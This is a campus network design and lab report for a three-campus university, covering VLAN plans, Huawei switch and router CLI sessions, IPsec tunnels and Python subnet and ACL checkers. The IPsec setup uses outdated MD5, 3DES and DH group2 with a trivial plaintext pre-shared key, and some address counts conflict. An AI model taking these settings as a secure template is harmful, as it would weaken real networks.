济南校区VLAN规划与泰安校区类似,主要有教学区、办公区、实验区、学生宿舍区,共划分约15个VLAN。考虑到IP地址使用需求,建议济南校区采用172.29.0.0/16网段,各VLAN掩码均为255.255.240.0,可充分满足4000余个地址的使用需求。下面是关键的VLAN规划:
| VLAN ID | IP网段 | 掩码 | 说明 | 网关 |
|---|---|---|---|---|
| VLAN 10 | 172.29.0.0 | 255.255.255.0 | 设备管理网段 | - |
| VLAN 20 | 172.29.16.0 | 255.255.240.0 | 教学区1 | 172.29.16.254 |
| VLAN 30 | 172.29.32.0 | 255.255.240.0 | 教学区2 | 172.29.32.254 |
| VLAN 40 | 172.29.48.0 | 255.255.240.0 | 实验区 | 172.29.48.254 |
| VLAN 50 | 172.29.64.0 | 255.255.240.0 | 办公区1 | 172.29.64.254 |
| VLAN 60 | 172.29.80.0 | 255.255.240.0 | 办公区2 | 172.29.80.254 |
| VLAN 70 | 172.29.96.0 | 255.255.240.0 | 学生宿舍1-10栋 | 172.29.96.254 |
| VLAN 80 | 172.29.112.0 | 255.255.240.0 | 学生宿舍11-20栋 | 172.29.112.254 |
2. Network topology design
Based on the VLAN plan, this proposal puts forward the following network topology design for the Shandong University of Science and Technology campus network:
Core layer design:
Two Huawei CloudEngine 12800 high-end core switches, model CE12816, are deployed in the data center of the Qingdao main campus. Each core switch is fitted with 2 main control units, 4 48-port 10GE line cards, 4 48-port GE line cards and 4 dual-port 100G QSFP28 line cards.
The two core switches use VRRP for gateway redundancy to avoid a single point of failure. Their uplinks are bundled over 2 100G ports with LACP, and their downlinks to the aggregation switches are likewise LACP bundles, providing link redundancy and extra bandwidth.
The core layer runs OSPF, forming neighbor relationships with the aggregation switches of the three campuses and exchanging routes with them.
The core switches use SVF stacking virtualization, so the two physical devices form one logical device with unified management and configuration.
Aggregation layer design:
Huawei S6720-54C aggregation switches are deployed in the Qingdao campus data center, each with 48 10GE SFP+ optical ports and 6 40G QSFP+ optical ports.
Each aggregation switch uses 2 40G QSFP+ ports, bundled with LACP, to uplink to the core switches, and 4 40G QSFP+ ports for cascading between aggregation switches.
Each aggregation switch connects 10-20 access switches on the Qingdao campus and can be scaled out horizontally as needed.
Two Huawei S6720-54C aggregation switches are also deployed in the central equipment room of each of the Tai'an and Jinan campuses, dual-homed to the Qingdao core switches over IPsec VPN or leased lines at 10G or higher, giving connectivity between the three sites.
Each remote aggregation switch in turn downlinks over 10GE LACP bundles to the access switches of its campus.
Aggregation switches use stacking or VRRP for redundancy to avoid a single point of failure, and run OSPF as the regional aggregation node.
Access layer design:
On the Qingdao campus, 2-4 S5720-28X-SI-24S-AC access switches are deployed per building, according to floor area and number of network drops.
Each access switch uplinks to the aggregation layer over 2-4 10GE SFP+ ports bundled with LACP, and serves office PCs, APs, IP phones, cameras and other endpoints over 24 GE RJ45 ports, meeting the need for gigabit access.
On the Tai'an and Jinan campuses, each teaching building, office building and dormitory building likewise gets 2 S5720-28X-SI-24S-AC building access switches, sized by the number of network drops.
The access switches in each building run MSTP to prevent loops and are dual-homed for redundancy.
Access switches enable IGMP Snooping and MLD Snooping so that, combined with multicast and VLANs, multicast traffic is replicated and isolated efficiently.
Wireless network design:
In line with the wired plan, Huawei AP6050DN access points are deployed in the key areas of the Qingdao and Tai'an campuses (teaching buildings, office buildings, library), averaging one AP per 8-12 rooms.
In student dormitories and public activity areas, ceiling-mounted AP2050DN-S units are deployed, averaging one AP per 3-4 rooms.
All wireless APs are PoE-powered from the PoE ports of the Layer 2 access switches. The wireless AP management VLAN is VLAN 130.
Detailed analysis
The Shandong University of Science and Technology network is as follows:
It consists of the Qingdao campus (main campus), the Tai'an campus and the Jinan campus.
192.168.0.0/24 is the server segment.
172.16-31.x.x (172.16.0.0/12) is the client segment.
10.0.0.x is the switch segment.
In Tai'an the split is: 172.30.132.0/24 is assigned to the 1C401, 1C402 and 1C403 computer rooms, and 172.30.128.0/24 is assigned to the 1B computer room.
A traceroute from Tai'an to 192.168.111.7 (the HTTP reverse proxy server) follows:
Route trace:
root@ovovoov:~# traceroute 192.168.111.7
traceroute to 192.168.111.7 (192.168.111.7), 30 hops max, 60 byte packets
1 10.31.0.1 (10.31.0.1) 0.305 ms 0.278 ms 0.263 ms (local router)
2 172.29.110.254 (172.29.110.254) 11.057 ms 11.105 ms 10.980 ms
3 172.29.231.2 (172.29.231.2) 6.611 ms 6.573 ms 6.556 ms
4 172.16.0.6 (172.16.0.6) 0.622 ms 0.769 ms 0.541 ms
5 * * *
6 * * *
7 172.16.0.113 (172.16.0.113) 12.178 ms 12.318 ms 12.547 ms
8 192.168.111.7 (192.168.111.7) 10.567 ms 10.584 ms 10.620 ms
Actual latency:
root@ovovoov:~# ping 192.168.111.7
PING 192.168.111.7 (192.168.111.7) 56(84) bytes of data.
64 bytes from 192.168.111.7: icmp_seq=1 ttl=57 time=10.7 ms
64 bytes from 192.168.111.7: icmp_seq=2 ttl=57 time=10.5 ms
64 bytes from 192.168.111.7: icmp_seq=3 ttl=57 time=10.5 ms
Qingdao and Tai'an may be linked in one of two ways:
- IPsec tunnel
- Direct fiber
Actual route test (accessing the SDUST mirror site, whose address is resolved by the internal DNS 192.168.100.8); this server is the reverse proxy.

Education network egress route trace:

For 2000 hosts, dividing into VLANs is sufficient; the 172.16-31 range can be carved up and assigned.
The space available in 172.16/12 is:
- Network address: 172.16.0.0/12
- IP range: 172.16.0.0-172.31.255.255
- Usable IP range: 172.16.0.1-172.31.255.254
- Total addresses: $2^{20} = 1,048,576$
The address space is more than sufficient, and can be subdivided into /24s many times over to distinguish individual rooms.
One feasible plan follows; the actual division must be based on the customer's real requirements.
| VLAN ID | Subnet | Mask | Hosts | Description |
|---|---|---|---|---|
| VLAN10 | 172.16.0.0/21 | 255.255.248.0 | 2046 | Teaching area 1 |
| VLAN20 | 172.16.8.0/21 | 255.255.248.0 | 2046 | Teaching area 2 |
| VLAN30 | 172.16.16.0/21 | 255.255.248.0 | 2046 | Office area 1 |
| VLAN40 | 172.16.24.0/21 | 255.255.248.0 | 2046 | Office area 2 |
| VLAN50 | 172.16.32.0/21 | 255.255.248.0 | 2046 | Laboratory area |
| VLAN60 | 172.16.40.0/22 | 255.255.252.0 | 1022 | Computer room area |
| VLAN70 | 172.16.44.0/22 | 255.255.252.0 | 1022 | Student dormitory area 1 |
| VLAN80 | 172.16.48.0/22 | 255.255.252.0 | 1022 | Student dormitory area 2 |
| VLAN90 | 172.16.52.0/22 | 255.255.252.0 | 1022 | Student dormitory area 3 |
| VLAN100 | 172.16.56.0/24 | 255.255.255.0 | 254 | Server area |
| VLAN110 | 172.16.57.0/24 | 255.255.255.0 | 254 | Network management area |
| VLAN120 | 172.16.58.0/24 | 255.255.255.0 | 254 | Portal server area |
| VLAN130 | 172.16.59.0/24 | 255.255.255.0 | 254 | Wireless controller management area |
Notes:
- Teaching and office areas have the most hosts, so each of their VLANs gets a /21 subnet with 2046 usable addresses, leaving ample room for growth.
- Student dormitory areas have slightly fewer hosts than the teaching and office areas and get a /22 subnet with 1022 usable addresses, which meets demand.
- Computer rooms, servers, network management and similar areas have a relatively fixed number of devices and get a /24 subnet with 254 usable addresses, which is sufficient.
- The campus network has about 14336 usable IP addresses in total, far fewer than in the previous plan, yet still enough for 2000 hosts with 30% headroom for growth.
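The plan above can be checked mechanically. The following is an added example (not part of the original notes) that uses Python's standard `ipaddress` module to verify that every VLAN subnet lies inside 172.16.0.0/12, that no two subnets overlap, and to recompute the usable host count per VLAN and in total; the VLAN descriptions are the table's, translated.

```python
"""Validate the sample VLAN/subnet plan (added example, not from the original notes)."""
import ipaddress

# The plan from the table above: (VLAN id, prefix, description).
VLAN_PLAN = [
    (10, "172.16.0.0/21", "Teaching area 1"),
    (20, "172.16.8.0/21", "Teaching area 2"),
    (30, "172.16.16.0/21", "Office area 1"),
    (40, "172.16.24.0/21", "Office area 2"),
    (50, "172.16.32.0/21", "Laboratory area"),
    (60, "172.16.40.0/22", "Computer room area"),
    (70, "172.16.44.0/22", "Student dormitory area 1"),
    (80, "172.16.48.0/22", "Student dormitory area 2"),
    (90, "172.16.52.0/22", "Student dormitory area 3"),
    (100, "172.16.56.0/24", "Server area"),
    (110, "172.16.57.0/24", "Network management area"),
    (120, "172.16.58.0/24", "Portal server area"),
    (130, "172.16.59.0/24", "Wireless controller management area"),
]

# The private block every VLAN must be carved from (172.16/12 as in the text).
PARENT = ipaddress.ip_network("172.16.0.0/12")


def usable_hosts(prefix):
    """Usable host addresses in a subnet (network and broadcast excluded)."""
    net = ipaddress.ip_network(prefix, strict=True)
    return net.num_addresses - 2


def gateway_for(prefix):
    """Last usable address of the subnet; for a /24 this is the .254 gateway used above."""
    net = ipaddress.ip_network(prefix, strict=True)
    return str(net.broadcast_address - 1)


def validate_plan(plan, parent=PARENT):
    """Check a plan and return {'problems': [...], 'hosts': {vlan: n}, 'total': n}.

    An empty 'problems' list means: every prefix is well formed (no host bits set),
    lies inside `parent`, and no two VLAN subnets overlap.
    """
    problems = []
    nets = []
    for vlan_id, prefix, _desc in plan:
        try:
            net = ipaddress.ip_network(prefix, strict=True)
        except ValueError as exc:  # e.g. 172.16.1.0/21 has host bits set
            problems.append("VLAN %d: invalid prefix %s (%s)" % (vlan_id, prefix, exc))
            continue
        if not net.subnet_of(parent):
            problems.append("VLAN %d: %s is outside %s" % (vlan_id, net, parent))
        nets.append((vlan_id, net))
    # Pairwise overlap check; O(n^2) is fine for a campus-sized plan.
    for i, (id_a, net_a) in enumerate(nets):
        for id_b, net_b in nets[i + 1:]:
            if net_a.overlaps(net_b):
                problems.append("VLAN %d %s overlaps VLAN %d %s" % (id_a, net_a, id_b, net_b))
    hosts = {vlan_id: net.num_addresses - 2 for vlan_id, net in nets}
    return {"problems": problems, "hosts": hosts, "total": sum(hosts.values())}


if __name__ == "__main__":
    result = validate_plan(VLAN_PLAN)
    for vlan_id, prefix, desc in VLAN_PLAN:
        print("VLAN%-4d %-18s hosts=%-5d gw=%-15s %s"
              % (vlan_id, prefix, result["hosts"][vlan_id], gateway_for(prefix), desc))
    print("total usable hosts:", result["total"])
    print("problems:", result["problems"] or "none")
```

Running it reports no problems and a recomputed total of 15334 usable addresses across the 13 VLANs.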

A simple topology diagram follows:
The diagram omits some Internet egress core switches, the GIWIFI router and so on, and the education network egress is not shown either.

Configuration:
Router configuration
AR5
<Huawei>sys
Enter system view, return user view with Ctrl+Z.
[Huawei]undo inf
[Huawei]undo info-center en
[Huawei]undo info-center enable
Info: Information center is disabled.
[Huawei]int g0/0/1
[Huawei-GigabitEthernet0/0/1]ip addr 10.1.1.1 24
[Huawei-GigabitEthernet0/0/1]int g0/0/1
[Huawei-GigabitEthernet0/0/1]ip addr 10.30.30.1 24
[Huawei-GigabitEthernet0/0/1]ip addr 10.1.1.1 24
[Huawei-GigabitEthernet0/0/1]int g0/0/2
[Huawei-GigabitEthernet0/0/2]int g0/0/0
[Huawei-GigabitEthernet0/0/0]ip addr 10.30.30.1 24
[Huawei-GigabitEthernet0/0/0]rip
[Huawei-rip-1]version 2
[Huawei-rip-1]network 10.0.0.0
[Huawei-rip-1]
AR2:
<Huawei>sys
Enter system view, return user view with Ctrl+Z.
[Huawei]undo info-center enable
Info: Information center is disabled.
[Huawei]int g0/0/0
[Huawei-GigabitEthernet0/0/0]ip addr 10.1.1.2 24
[Huawei-GigabitEthernet0/0/0]int g0/0/1
[Huawei-GigabitEthernet0/0/1]ip addr 10.2.2.2 24
[Huawei-GigabitEthernet0/0/1]int g0/0/2
[Huawei-GigabitEthernet0/0/2]ip addr 10.20.20.1 24
[Huawei-GigabitEthernet0/0/2]rip 1
[Huawei-rip-1]vers
[Huawei-rip-1]version 2
[Huawei-rip-1]netwo
[Huawei-rip-1]network 10.0.0.0
[Huawei-rip-1]
AR3
<Huawei>sys
Enter system view, return user view with Ctrl+Z.
[Huawei]int g0/0/0
[Huawei-GigabitEthernet0/0/0]ip addr 10.2.2.3 24
[Huawei-GigabitEthernet0/0/0]
Jun 18 2024 18:27:37-08:00 Huawei %%01IFNET/4/LINK_STATE(l)[0]:The line protocol
IP on the interface GigabitEthernet0/0/0 has entered the UP state.
[Huawei-GigabitEthernet0/0/0]undo in
[Huawei-GigabitEthernet0/0/0]undo inf
[Huawei-GigabitEthernet0/0/0]q
[Huawei]undo inf
[Huawei]undo info-center en
[Huawei]undo info-center enable
Info: Information center is disabled.
[Huawei]int g0/0/1
[Huawei-GigabitEthernet0/0/1]ip addr 10.10.10.1 24
[Huawei-GigabitEthernet0/0/1]rip 1
[Huawei-rip-1]vers
[Huawei-rip-1]version 2
[Huawei-rip-1]netw
[Huawei-rip-1]network 10.0.0.0
[Huawei-rip-1]
Tai'an: interconnecting the VLANs on the core switch
Core switch
<Huawei>sys
Enter system view, return user view with Ctrl+Z.
[Huawei]undo inf
[Huawei]undo info-center en
[Huawei]undo info-center enable
Info: Information center is disabled.
[Huawei]vlan b 130 128 132 300 160 2110
Info: This operation may take a few seconds. Please wait for a moment...done.
[Huawei]int vlanif 130
[Huawei-Vlanif130]ip addr 172.30.130.1
^
Error:Incomplete command found at '^' position.
[Huawei-Vlanif130]ip addr 172.30.130.1 24
[Huawei-Vlanif130]int vlanif 128
[Huawei-Vlanif128]ip addr 172.30.128.1
^
Error:Incomplete command found at '^' position.
[Huawei-Vlanif128]ip addr 172.30.128.1 24
[Huawei-Vlanif128]int vlanif 132
[Huawei-Vlanif132]ip addr 172.30.132.1 24
[Huawei-Vlanif132]int vlanif 300
[Huawei-Vlanif300]ip addr 172.20.20.1 24
[Huawei-Vlanif300]int g0/0/1
[Huawei-GigabitEthernet0/0/1]p l t
[Huawei-GigabitEthernet0/0/1]p l a v a
^
Error:Ambiguous command found at '^' position.
[Huawei-GigabitEthernet0/0/1]p t a v a
[Huawei-GigabitEthernet0/0/1]
LSW4
<Huawei>sys
Enter system view, return user view with Ctrl+Z.
[Huawei]undo inf
[Huawei]undo info-center en
[Huawei]undo info-center enable
Info: Information center is disabled.
[Huawei]vlan b 130 128 132 300 160 2110
Info: This operation may take a few seconds. Please wait for a moment...done.
[Huawei]int e0/0/3
[Huawei-Ethernet0/0/3]p l a
[Huawei-Ethernet0/0/3]p d v 132
[Huawei-Ethernet0/0/3]int e0/0/4
[Huawei-Ethernet0/0/4]p l a
[Huawei-Ethernet0/0/4]p d v 128
[Huawei-Ethernet0/0/4]int e0/0/5
[Huawei-Ethernet0/0/5]p l a
[Huawei-Ethernet0/0/5]p d v 128
[Huawei-Ethernet0/0/5]int e 0/0/2
[Huawei-Ethernet0/0/2]p l t
[Huawei-Ethernet0/0/2]p t a v a
[Huawei-Ethernet0/0/2]int e0/0/1
[Huawei-Ethernet0/0/1]p l t
[Huawei-Ethernet0/0/1]p t a v a
LSW5
[Huawei]undo in e
Info: Information center is disabled.
[Huawei]int e0/0/1
[Huawei-Ethernet0/0/1]p l t
[Huawei-Ethernet0/0/1]p t a v a
[Huawei-Ethernet0/0/1]vlan b 130 128 132 300 160 2110
Info: This operation may take a few seconds. Please wait for a moment...done.
[Huawei]int e0/0/2
[Huawei-Ethernet0/0/2]p l a
[Huawei-Ethernet0/0/2]p d v 130
[Huawei-Ethernet0/0/2]
Test that the VLANs communicate normally


Jinan: core switch configuration
Core switch configuration:
[Huawei]undo in en
Info: Information center is disabled.
[Huawei]vlan b 130 128 132 300 160 2110
Info: This operation may take a few seconds. Please wait for a moment...done.
[Huawei]vlan b 130 128 132 300 160 2110 2111
Info: This operation may take a few seconds. Please wait for a moment...done.
[Huawei]int vlanif 2110
[Huawei-Vlanif2110]ip addr 172.21.10.1 24
[Huawei-Vlanif2110]int vlanif 2111
[Huawei-Vlanif2111]ip addr 172.21.11.1 24
[Huawei-Vlanif2111]int g0/0/3
[Huawei-GigabitEthernet0/0/3]p l a
[Huawei-GigabitEthernet0/0/3]p d v 2111
[Huawei-GigabitEthernet0/0/3]int g0/0/2
[Huawei-GigabitEthernet0/0/2]p l a
[Huawei-GigabitEthernet0/0/2]p d v 2110
Ping succeeds

Qingdao: core switch

<Huawei>sys
Enter system view, return user view with Ctrl+Z.
[Huawei]undo in en
Info: Information center is disabled.
[Huawei]vlan b 130 128 132 300 160 2110 2111
Info: This operation may take a few seconds. Please wait for a moment...done.
[Huawei]vlan b 130 128 132 300 160 2110 2111 170
Info: This operation may take a few seconds. Please wait for a moment...done.
[Huawei]
[Huawei]int g0/0/2
[Huawei-GigabitEthernet0/0/2]p l a
[Huawei-GigabitEthernet0/0/2]p d v 160
[Huawei-GigabitEthernet0/0/2]int g0/0/3
[Huawei-GigabitEthernet0/0/3]p l a
[Huawei-GigabitEthernet0/0/3]p d v 170
[Huawei-GigabitEthernet0/0/3]int vlanif 160
[Huawei-Vlanif160]ip addr 172.16.0.1 24
[Huawei-Vlanif160]int vlanif 170
[Huawei-Vlanif170]ip addr 172.17.0.1 24
[Huawei-Vlanif170]
Ping succeeds

IP configuration
Tai'an:
Core switch static route
[Huawei-GigabitEthernet0/0/2]int vlanif 300
[Huawei-Vlanif300]ip addr 10.200.200.2 24
[Huawei-Vlanif300]int g0/0/2
[Huawei-GigabitEthernet0/0/2]p l a
[Huawei-GigabitEthernet0/0/2]p d v 300
[Huawei]ip route-static 0.0.0.0 0 10.200.200.1
Router:
[Huawei]sysname art
[art]int g0/0/0
[art-GigabitEthernet0/0/0]int g0/0/1
[art-GigabitEthernet0/0/0]ip addr 10.200.200.1 24
[art-GigabitEthernet0/0/0]int g0/0/1
[art-GigabitEthernet0/0/1]ip addr 10.20.20.2 24
[arq]ip route-static 0.0.0.0 0.0.0.0 10.20.20.1
Qingdao
Core switch static route
[Huawei]vlan b 301
Info: This operation may take a few seconds. Please wait for a moment...done.
[Huawei]int vlanif 301
[Huawei-Vlanif301]ip addr 10.100.100.2 24
[Huawei-Vlanif301]int g0/0/1
[Huawei-GigabitEthernet0/0/1]p l a
[Huawei-GigabitEthernet0/0/1]p d v 301
[Huawei-GigabitEthernet0/0/1]q
[Huawei]ip route-static 0.0.0.0 0 10.100.100.1
Router:
Enter system view, return user view with Ctrl+Z.
[Huawei]sysname ar1
[ar1]sysname arq
[arq]undo info en
Info: Information center is disabled.
[arq]int g0/0/0
[arq-GigabitEthernet0/0/0]ip addr 10.10.10.2 24
[arq-GigabitEthernet0/0/0]int g0/0/1
[arq-GigabitEthernet0/0/1]ip addr 10.100.100.1 24
[arq]ip route-static 0.0.0.0 0.0.0.0 10.10.10.1
Jinan:
<Huawei>sys
Enter system view, return user view with Ctrl+Z.
[Huawei]sysname arj
[arj]int g0/0/1
[arj-GigabitEthernet0/0/1]ip addr 10.30.30.2 24
[arj-GigabitEthernet0/0/1]q
[arj]undo info en
Info: Information center is disabled.
[arj]ip route-s
[arj]ip route-static 0.0.0.0 0.0.0.0 10.30.30.1
The public-network side can ping Qingdao and Jinan, and they can ping it back:

IPsec configuration
Tai'an
[art]acl 3000
[art-acl-adv-3000]rule permit ip source 172.16.0.0 0.15.255.255 destination 172.16.0.0 0.15.255.255
[art-acl-adv-3000]rule 100 deny ip
[art-acl-adv-3000]ipsec proposal test
[art-ipsec-proposal-test]encapsulation-mode tunnel
[art-ipsec-proposal-test]transform esp
[art-ipsec-proposal-test]esp authentication-algorithm sha1
[art-ipsec-proposal-test]esp encryption-algorithm 3des
[art-ipsec-proposal-test]ike proposal 1
[art-ike-proposal-1]authentication-method pre-share
[art-ike-proposal-1]authentication-algorithm md5
[art-ike-proposal-1]dh group2
[art-ike-proposal-1]ike peer test v2
[art-ike-peer-test]pre-shared-key cipher gdeie
[art-ike-peer-test]remote-address 10.10.10.2
[art-ike-peer-test]ipsec policy RT-RQ-IPSecVPN 1 isakmp
[art-ipsec-policy-isakmp-RT-RQ-IPSecVPN-1]ike-peer test
[art-ipsec-policy-isakmp-RT-RQ-IPSecVPN-1]proposal test
[art-ipsec-policy-isakmp-RT-RQ-IPSecVPN-1]security acl 3000
[art-ipsec-policy-isakmp-RT-RQ-IPSecVPN-1]int g0/0/1
[art-GigabitEthernet0/0/1]ipsec policy RT-RQ-IPSecVPN
[art]ip route-static 172.30.0.0 255.255.0.0 10.200.200.2
Qingdao
<arq>sys
Enter system view, return user view with Ctrl+Z.
[arq]acl 3000
[arq-acl-adv-3000]rule permit ip source 172.16.0.0 0.15.255.255 destination 172.16.0.0 0.15.255.255
[arq-acl-adv-3000]rule 100 deny ip
[arq-acl-adv-3000]ipsec proposal test
[arq-ipsec-proposal-test]encapsulation-mode tunnel
[arq-ipsec-proposal-test]transform esp
[arq-ipsec-proposal-test]esp authentication-algorithm sha1
[arq-ipsec-proposal-test]esp encryption-algorithm 3des
[arq-ipsec-proposal-test]ike proposal 1
[arq-ike-proposal-1]authentication-method pre-share
[arq-ike-proposal-1]authentication-algorithm md5
[arq-ike-proposal-1]dh group2
[arq-ike-proposal-1]ike peer test v2
[arq-ike-peer-test]pre-shared-key cipher gdeie
[arq-ike-peer-test]remote-address 10.20.20.2
[arq-ike-peer-test]ipsec policy RT-RQ-IPSecVPN 1 isakmp
[arq-ipsec-policy-isakmp-RT-RQ-IPSecVPN-1]ike-peer test
[arq-ipsec-policy-isakmp-RT-RQ-IPSecVPN-1]proposal test
[arq-ipsec-policy-isakmp-RT-RQ-IPSecVPN-1]security acl 3000
[arq-ipsec-policy-isakmp-RT-RQ-IPSecVPN-1]int g0/0/0
[arq-GigabitEthernet0/0/0]ipsec policy RT-RQ-IPSecVPN
[arq]ip route-static 172.16.0.0 255.255.0.0 10.100.100.2
[arq]ip route-static 172.17.0.0 255.255.0.0 10.100.100.2
Jinan
Jinan and Qingdao establish a second IPsec tunnel:
Core switch
[Huawei]vlan b 302
Info: This operation may take a few seconds. Please wait for a moment...done.
[Huawei]int vlanif 302
[Huawei-Vlanif302]ip addr 10.50.50.2 24
[Huawei-Vlanif302]p d a
Error: Domain does not exist.Please make sure whether the input is correct.
[Huawei-Vlanif302]int g0/0/1
[Huawei-GigabitEthernet0/0/1] p l a
[Huawei-GigabitEthernet0/0/1]p d v 302
[Huawei-GigabitEthernet0/0/1]q
[Huawei]ip route-static 0.0.0.0 0 10.50.50.1
[Huawei]ping 10.50.50.1
PING 10.50.50.1: 56 data bytes, press CTRL_C to break
Reply from 10.50.50.1: bytes=56 Sequence=1 ttl=255 time=30 ms
Reply from 10.50.50.1: bytes=56 Sequence=2 ttl=255 time=40 ms
Reply from 10.50.50.1: bytes=56 Sequence=3 ttl=255 time=40 ms
Reply from 10.50.50.1: bytes=56 Sequence=4 ttl=255 time=50 ms
Reply from 10.50.50.1: bytes=56 Sequence=5 ttl=255 time=20 ms
--- 10.50.50.1 ping statistics ---
5 packet(s) transmitted
5 packet(s) received
0.00% packet loss
round-trip min/avg/max = 20/36/50 ms
[Huawei]
Jinan router
Multiple tunnels on a single IP are prone to problems; this step may fail and can simply be skipped.
[arj]int g0/0/0
[arj-GigabitEthernet0/0/0]ip addr 10.50.50.1 24
[arj-GigabitEthernet0/0/0]acl 3000
[arj-acl-adv-3000]rule permit ip source 172.16.0.0 0.15.255.255 destination 172.16.0.0 0.15.255.255
[arj-acl-adv-3000]rule 100 deny ip
[arj-acl-adv-3000]ipsec proposal test
[arj-ipsec-proposal-test]encapsulation-mode tunnel
[arj-ipsec-proposal-test]transform esp
[arj-ipsec-proposal-test]esp authentication-algorithm sha1
[arj-ipsec-proposal-test]esp encryption-algorithm 3des
[arj-ipsec-proposal-test]ike proposal 1
[arj-ike-proposal-1]authentication-method pre-share
[arj-ike-proposal-1]authentication-algorithm md5
[arj-ike-proposal-1]dh group2
[arj-ike-proposal-1]ike peer test v2
[arj-ike-peer-test]pre-shared-key cipher gdeie
[arj-ike-peer-test]remote-address 10.10.20.2
[arj-ike-peer-test]ipsec policy RT-RQ-IPSecVPN 1 isakmp
[arj-ipsec-policy-isakmp-RT-RQ-IPSecVPN-1]ipsec policy RJ-RQ-IPSecVPN 1 isakmp
[arj-ipsec-policy-isakmp-RJ-RQ-IPSecVPN-1]ike-peer test
[arj-ipsec-policy-isakmp-RJ-RQ-IPSecVPN-1]proposal test
[arj-ipsec-policy-isakmp-RJ-RQ-IPSecVPN-1]security acl 3000
[arj-ipsec-policy-isakmp-RJ-RQ-IPSecVPN-1]int g0/0/1
[arj-GigabitEthernet0/0/1]ipsec policy RJ-RQ-IPSecVPN
[arj-GigabitEthernet0/0/1]ip route-static 172.121.0.0 255.255.0.0 10.50.50.2
[arj]ip route-static 172.21.0.0 255.255.0.0 10.50.50.2
[arj]undo ip route-static 172.121.0.0 255.255.0.0 10.50.50.2

The router can ping the addresses behind the core switch:

Qingdao: second IPsec tunnel, to Jinan
A second IP is needed, since multiple tunnels on a single IP are prone to problems. This step may fail and can simply be skipped.
[arq]acl 3001
[arq-acl-adv-3001]rule permit ip source 172.16.0.0 0.15.255.255 destination 172.21.0.0 0.0.255.255
[arq-acl-adv-3001]rule deny ip
[arq-acl-adv-3001]ipsec proposal rq-rj
[arq-ipsec-proposal-rq-rj]encapsulation-mode tunnel
[arq-ipsec-proposal-rq-rj]transform esp
[arq-ipsec-proposal-rq-rj]esp authentication-algorithm sha1
[arq-ipsec-proposal-rq-rj]esp encryption-algorithm 3des
[arq-ipsec-proposal-rq-rj]ike proposal 2
[arq-ike-proposal-2]authentication-method pre-share
[arq-ike-proposal-2]authentication-algorithm md5
[arq-ike-proposal-2]dh group2
[arq-ike-proposal-2]ike peer rq-rj v2
[arq-ike-peer-rq-rj]remote-address 10.30.30.2
[arq-ike-peer-rq-rj]ipsec policy RQ-RJ-IPsecVPN 1 isakmp
[arq-ipsec-policy-isakmp-RQ-RJ-IPsecVPN-1]ike-peer rq-rj
[arq-ipsec-policy-isakmp-RQ-RJ-IPsecVPN-1]proposal rq-rj
[arq-ipsec-policy-isakmp-RQ-RJ-IPsecVPN-1]security acl 3001
[arq-ipsec-policy-isakmp-RQ-RJ-IPsecVPN-1]int g0/0/2
[arq-GigabitEthernet0/0/2]ipsec policy RQ-RJ-IPsecVPN
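The security ACL of each policy decides which flows that policy encrypts. The following is an added example (not from the original notes or any Huawei tool) that evaluates Huawei-style wildcard ACL rules in first-match order against constructed sample flows; it shows that a Qingdao-to-Jinan flow (172.16.x to 172.21.x) is permitted by both acl 3000 and acl 3001 on arq, because 172.21.0.0/16 lies inside 172.16.0.0/12, which is one reason the second tunnel on the same router is fragile.

```python
"""Evaluate Huawei advanced-ACL wildcard rules (added example, not from the original notes)."""
import ipaddress
import re

# Grammar of the rule lines used in the sessions above: rule number optional,
# source/destination optional; a bare "rule deny ip" matches everything.
RULE_RE = re.compile(
    r"rule(?:\s+(\d+))?\s+(permit|deny)\s+ip"
    r"(?:\s+source\s+(\S+)\s+(\S+))?"
    r"(?:\s+destination\s+(\S+)\s+(\S+))?\s*$"
)


def _to_int(addr):
    """Dotted quad -> 32-bit int, or None when the field is absent (= any)."""
    return int(ipaddress.IPv4Address(addr)) if addr is not None else None


def parse_rules(text):
    """Parse ACL rule lines into (action, src, src_wc, dst, dst_wc) tuples of ints."""
    rules = []
    for line in text.strip().splitlines():
        m = RULE_RE.match(line.strip())
        if not m:
            raise ValueError("unrecognised rule: %r" % line)
        _num, action, src, src_wc, dst, dst_wc = m.groups()
        rules.append((action, _to_int(src), _to_int(src_wc), _to_int(dst), _to_int(dst_wc)))
    return rules


def _wc_match(addr, base, wildcard):
    """Huawei wildcard semantics: 1 bits are 'don't care', 0 bits must equal base."""
    if base is None:
        return True
    care = 0xFFFFFFFF ^ wildcard
    return (addr & care) == (base & care)


def acl_action(rules, src, dst):
    """First matching rule decides. No match means the flow is not selected by
    this security ACL, i.e. the policy does not encrypt it; reported as 'deny'."""
    s, d = _to_int(src), _to_int(dst)
    for action, base_s, wc_s, base_d, wc_d in rules:
        if _wc_match(s, base_s, wc_s) and _wc_match(d, base_d, wc_d):
            return action
    return "deny"


# The two security ACLs configured on the Qingdao router (arq) above.
ACL_3000 = parse_rules("""
rule permit ip source 172.16.0.0 0.15.255.255 destination 172.16.0.0 0.15.255.255
rule 100 deny ip
""")
ACL_3001 = parse_rules("""
rule permit ip source 172.16.0.0 0.15.255.255 destination 172.21.0.0 0.0.255.255
rule deny ip
""")

POLICIES = {
    "RT-RQ-IPSecVPN (acl 3000)": ACL_3000,
    "RQ-RJ-IPsecVPN (acl 3001)": ACL_3001,
}


def matching_policies(src, dst, policies=POLICIES):
    """Names of every policy whose security ACL selects the flow; more than one is ambiguous."""
    return [name for name, rules in policies.items() if acl_action(rules, src, dst) == "permit"]


if __name__ == "__main__":
    # Constructed sample flows: Qingdao host to Tai'an, to Jinan, and to the Internet.
    for src, dst in [("172.16.0.10", "172.30.128.20"),
                     ("172.16.0.10", "172.21.10.20"),
                     ("172.16.0.10", "8.8.8.8")]:
        hits = matching_policies(src, dst)
        print("%s -> %s: %s" % (src, dst, hits or "no IPsec policy, forwarded in clear"))
```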
Check status:

The router can ping the 172 subnets
ARQ:

ART:

IPsec test: the Tai'an cloud center successfully pings the Qingdao 172.16.0.0/16 segment through IPsec. Ping succeeded.

Packet capture on the public network:

IPsec test 2: the Tai'an campus cloud center successfully pings the Qingdao 172.17.0.0/16 segment through IPsec.

Packet capture.
Full topology: configuration files

AR5
[Huawei]dis current-configuration
[V200R003C00]
#
snmp-agent local-engineid 800007DB03000000000000
snmp-agent
#
clock timezone China-Standard-Time minus 08:00:00
#
portal local-server load portalpage.zip
#
drop illegal-mac alarm
#
undo info-center enable
#
set cpu-usage threshold 80 restore 75
#
aaa
authentication-scheme default
authorization-scheme default
accounting-scheme default
domain default
domain default_admin
local-user admin password cipher %$%$K8m.Nt84DZ}e#<0`8bmE3Uw}%$%$
local-user admin service-type http
#
firewall zone Local
priority 15
#
interface GigabitEthernet0/0/0
